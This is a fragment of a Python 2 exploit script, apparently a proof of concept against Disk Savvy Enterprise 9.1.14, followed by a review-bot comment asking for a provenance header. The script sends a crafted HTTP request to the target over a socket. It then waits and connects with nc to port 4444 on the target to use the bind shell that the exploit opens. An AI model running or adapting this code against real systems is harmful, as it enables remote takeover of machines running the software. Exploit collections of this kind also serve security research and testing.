request += "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.8.0" + "\r\n"
request += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8" + "\r\n"
request += "Accept-Language: en-US,en;q=0.5" + "\r\n"
request += "Accept-Encoding: gzip, deflate" + "\r\n"
request += "Connection: keep-alive" + "\r\n\r\n"
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host,port))
s.send(request)
s.close()
print "Waiting for shell..."
time.sleep(5)
os.system("nc " + host + " 4444")
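Review bot: the new file has no provenance header. The comments at the top give only the product build (Disk Savvy Enterprise 9.1.14) and the test platforms; there is no author, date, or advisory or vendor reference, whereas the text entries removed in this same commit each open with a source: line. The script is also Python 2 only (print "Waiting for shell..." is a statement, and a str is passed to s.send) behind a generic #!/usr/bin/python shebang, which should be stated in the header so the entry is not mistaken for a broken one on a Python 3 host. Please add those comment lines before merging.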